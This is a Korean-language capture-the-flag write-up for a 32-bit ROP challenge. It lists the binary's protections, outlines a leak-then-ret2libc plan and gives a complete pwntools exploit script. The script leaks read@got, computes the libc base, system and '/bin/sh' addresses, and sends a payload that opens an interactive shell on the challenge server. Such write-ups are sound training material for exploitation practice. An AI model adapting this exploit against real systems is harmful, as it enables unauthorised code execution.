[HackCTF] ROP 풀이 (300p)

풀이

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

---

입력을 받고, Hello, World!를 출력한 뒤 프로그램을 종료한다.

---

ROP 문제라고 나와있는 만큼, 정석적인 ROP 문제로 보인다.

32bit ROP니, read write를 적절히 이용해 문제를 풀어주면 된다.

 

1. write로 read@got leak

2. read로 bss 영역에 /bin/sh 입력

3. read로 write@got overwrite

 

또는

 

1. write로 read@got leak

2. libc base를 구해 system 실행

---

from pwn import *

context.log_level = 'debug'
p = remote('ctf.j0n9hyun.xyz', 3021)
e = ELF('./rop')
libc = ELF('./libc.so.6')

read_plt = e.plt['read']
read_got = e.got['read']
write_plt = e.plt['write']
write_got = e.got['write']
pppr = 0x8048509
bss = hex(e.get_section_by_name('.bss').header.sh_addr)

payload = 'A'*0x88 + 'B'*4

payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(read_got)
payload += p32(4)
payload += p32(e.symbols['main'])
#payload += p32(read_plt)
#payload += p32(pppr)
#payload += p32(0)
#payload += p32(bss)
#payload += p32(4)

#payload += p32(read_plt)
#payload += p32(pppr)
#payload += p32(0)
#payload += p32(write_got)
#payload += p32(4)

#payload += p32(write_plt)

p.send(payload)

arr = u32(p.recv(4))
base = arr - libc.symbols['read']
system = base + libc.symbols['system']
binsh = base + list(libc.search('/bin/sh'))[0]

print str(hex(base))
print str(hex(system))
print str(hex(binsh))

payload = 'A'*0x88 + 'B'*0x4
payload += p32(system)
payload += 'A'*4
payload += p32(binsh)

p.send(payload)
p.interactive()